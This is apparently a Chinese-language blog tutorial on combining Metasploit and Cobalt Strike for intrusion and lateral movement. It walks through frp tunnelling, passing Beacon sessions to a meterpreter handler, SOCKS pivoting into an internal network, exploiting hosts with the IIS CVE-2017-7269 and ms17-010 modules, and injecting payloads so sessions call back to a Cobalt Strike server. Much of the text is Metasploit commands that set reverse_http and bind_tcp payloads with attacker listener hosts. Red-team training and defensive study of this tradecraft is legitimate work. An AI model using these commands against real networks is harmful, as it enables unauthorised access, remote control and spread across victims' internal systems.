MSF&&CS联动

内网穿透

因为需要派生shell当然需要外网的服务,这里就直接使用frp就行
image.png

利用CS为MSF服务

利用CS的Beacon为MSF派生Shell

在msf中配置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost ip
set lport port
set ExitOnSession False
run -j

在cs中建立一个外部监听器 Foreign HTTP
image.png
然后 spawn 监听器名称就OK
image.png

利用CS提供代理转发

利用Beacon建立 socks 代理:
在Beancon输入socks 监听端口或者图形化
image.png
在 view -> Proxy Pivots 中可以看到建立的转发器,点击Tunnel即可获得MSF的转发命令:
image.png
复制到msf界面就行。
然后这里使用cve_2017_7269来打内网的机器,因为不出网所以直接正向连接

setg Proxies socks4:xxx:8986
use exploit/windows/iis/cve-2017-7269
set payload windows/meterpreter/bind_tcp
run

image.png

利用MSF为CS服务

获取一个Shell对话

因为并不是所有的exp都可以反弹meterpreter对话。
在cs中点击Attacks -> Web Drive-by -> Scripted Web Delivery或者点如图所示
image.png
填写好信息之后点击OK就会弹出对话框
image.png
然后就可以看到上线Python如果有环境也是一样的。

获取一个meterpreter会话

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST CS_IP
set LPORT CS_PORT
set session 会话几
set disablepayloadhandler true   //设置msf不监听不然没有会话建立 CS也收不到会话

image.png
因为没设置PID就会则会创建一个32位的notepad.exe进程。
image.png

直接反弹回cs

在MSF漏洞利用时直接请求并加载CS的载荷和上面基本一样,这里用ms17-010测试

set payload windows/meterpreter/reverse_http
set lport cs_port
set lhost cs_host
set disablepayloadhandler true //不监听

最终是calc弹回来的会话。
image.png

posted @ 2022-03-06 21:07  R0ser1  阅读(35)  评论(0编辑  收藏  举报